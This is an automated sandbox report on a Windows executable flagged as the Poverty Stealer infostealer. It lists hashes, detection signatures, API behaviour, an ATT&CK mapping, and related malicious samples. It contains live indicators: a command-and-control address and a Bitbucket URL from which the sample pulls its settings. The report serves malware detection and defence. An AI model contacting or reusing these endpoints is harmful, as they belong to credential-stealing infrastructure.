Create Interactive Tour

Windows Analysis Report
SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe

Overview

General Information

Sample name:SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
Analysis ID:1632699
MD5:f9fe873316a74e0d1c93357a904e133f
SHA1:d8a4387af178c7d9b4710c433d6d5c37b89c3d01
SHA256:b6cbf3bb81c4b91c2aa4552b4767106b9e9510e9e0cc21053913849882609e0c
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

Poverty Stealer
Score:72
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Poverty Stealer
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cleanup
{
  "C2 url": "185.244.212.106:2227"
}
SourceRuleDescriptionAuthorStrings
00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
    00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
      Process Memory Space: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe PID: 8300JoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.3.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
          0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2ebb040.5.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
            0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.6.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
              0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.1.unpackJoeSecurity_PovertyStealerYara detected Poverty StealerJoe Security
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Poverty Stealer {"C2 url": "185.244.212.106:2227"}
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeVirustotal: Detection: 29%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: H:\new Stub C++ for panel\Release\BigProject.pdb) source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                Source: Binary string: H:\new Stub C++ for panel\Release\BigProject.pdb source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0031F791 FindFirstFileExW,0_2_0031F791

                Networking

                barindex
                Source: Malware configuration extractorURLs: 185.244.212.106:2227
                Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003042E0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenA,InternetOpenUrlA,FreeLibrary,InternetReadFile,InternetReadFile,FreeLibrary,0_2_003042E0
                Source: global trafficHTTP traffic detected: GET /microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/settings HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421372610.00000000013CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/setting
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/t
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420456885.0000000002EC7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003028800_2_00302880
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003059A00_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003042E00_2_003042E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0032A0190_2_0032A019
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003231620_2_00323162
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003219E40_2_003219E4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030D2A10_2_0030D2A1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030E3D00_2_0030E3D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_00315C200_2_00315C20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003024D00_2_003024D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0031B4CF0_2_0031B4CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030A7600_2_0030A760
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_00327F600_2_00327F60
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_00312F5E0_2_00312F5E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: String function: 0030D970 appears 48 times
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal72.troj.winEXE@2/0@1/1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: 0<30_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: =30_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: =30_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: =30_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: =30_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: =30_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: 0<30_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: user32.dll0_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCommand line argument: Nr20_2_003271A0
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeVirustotal: Detection: 29%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: H:\new Stub C++ for panel\Release\BigProject.pdb) source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                Source: Binary string: H:\new Stub C++ for panel\Release\BigProject.pdb source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003059A0 GetTickCount,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,KiUserCallbackDispatcher,FreeLibrary,GetTickCount,Sleep,MessageBoxW,Concurrency::cancel_current_task,0_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030B122 pushad ; retn 0032h0_2_0030B123
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030D5CE push ecx; ret 0_2_0030D5E1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0031F791 FindFirstFileExW,0_2_0031F791
                Source: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420771923.0000000001387000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420497399.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421107805.0000000001387000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422270188.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421181026.0000000001387000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421265311.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1421992949.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421372610.00000000013CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003115E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003115E3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003059A0 GetTickCount,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,KiUserCallbackDispatcher,FreeLibrary,GetTickCount,Sleep,MessageBoxW,Concurrency::cancel_current_task,0_2_003059A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003024D0 mov eax, dword ptr fs:[00000030h]0_2_003024D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0032037D GetProcessHeap,0_2_0032037D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030D905 SetUnhandledExceptionFilter,0_2_0030D905
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030DB13 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0030DB13
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003115E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003115E3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_0030D779 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0030D779
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_003228A3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: EnumSystemLocalesW,0_2_0031A9E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: EnumSystemLocalesW,0_2_003221DA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: EnumSystemLocalesW,0_2_00322225
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: EnumSystemLocalesW,0_2_003222C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0032234B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: GetLocaleInfoW,0_2_0032259E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: GetLocaleInfoW,0_2_0031AE90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_003226C7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00321F2E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: GetLocaleInfoW,0_2_003227CD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exeCode function: 0_2_003138B9 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_003138B9

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2ebb040.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe PID: 8300, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2ebb040.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe.2f03b80.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1420376353.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe PID: 8300, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
                Obfuscated Files or Information
                LSASS Memory21
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                DLL Side-Loading
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS12
                System Information Discovery
                Distributed Component Object ModelInput Capture13
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632699 Sample: SecuriteInfo.com.Variant.Fr... Startdate: 08/03/2025 Architecture: WINDOWS Score: 72 9 bitbucket.org 2->9 13 Found malware configuration 2->13 15 Multi AV Scanner detection for submitted file 2->15 17 Yara detected Poverty Stealer 2->17 19 2 other signatures 2->19 6 SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe 12 2->6         started        signatures3 process4 dnsIp5 11 bitbucket.org 185.166.143.48, 443, 49707 AMAZON-02US Germany 6->11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe29%VirustotalBrowse
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                185.244.212.106:22270%Avira URL Cloudsafe

                Download Network PCAP: filteredfull

                NameIPActiveMaliciousAntivirus DetectionReputation
                bitbucket.org
                185.166.143.48
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://bitbucket.org/microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/settingsfalse
                    high
                    185.244.212.106:2227true
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://bitbucket.org/SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://bitbucket.org/microsoftingsoftwares/faw/raw/35a4772e22b353e621019b578e4e1bce5ba5d748/settingSecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1421372610.00000000013CF000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://bitbucket.org/tSecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000002.1422217807.0000000002E90000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://dz8aopenkvv6s.cloudfront.netSecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420456885.0000000002EC7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe, 00000000.00000003.1420412965.0000000002EBC000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            185.166.143.48
                            bitbucket.orgGermany
                            16509AMAZON-02USfalse
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1632699
                            Start date and time:2025-03-08 23:23:19 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 17s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:SecuriteInfo.com.Variant.Fragtor.519143.19980.21167.exe
                            Detection:MAL
                            Classification:mal72.troj.winEXE@2/0@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 14
                            • Number of non-executed functions: 53
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                            • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            bitbucket.orgDear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msgGet hashmaliciousScreenConnect ToolBrowse
                            • 185.166.143.48
                            Lead.Upload.Report.Feb.2025.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.48
                            https://bridesrilanka.com/myreservedroomGet hashmaliciousScreenConnect ToolBrowse
                            • 185.166.143.48
                            phish_alert_iocp_v1.4.48 - 2025-03-05T101050.751.emlGet hashmaliciousScreenConnect ToolBrowse
                            • 185.166.143.49
                            MCxU5Fj.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.166.143.50
                            soft.exeGet hashmaliciousGCleaner, LummaC Stealer, Socks5SystemzBrowse
                            • 185.166.143.48
                            foUENR5vt.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.166.143.50
                            67c2163c9db39.vbsGet hashmaliciousLummaC StealerBrowse
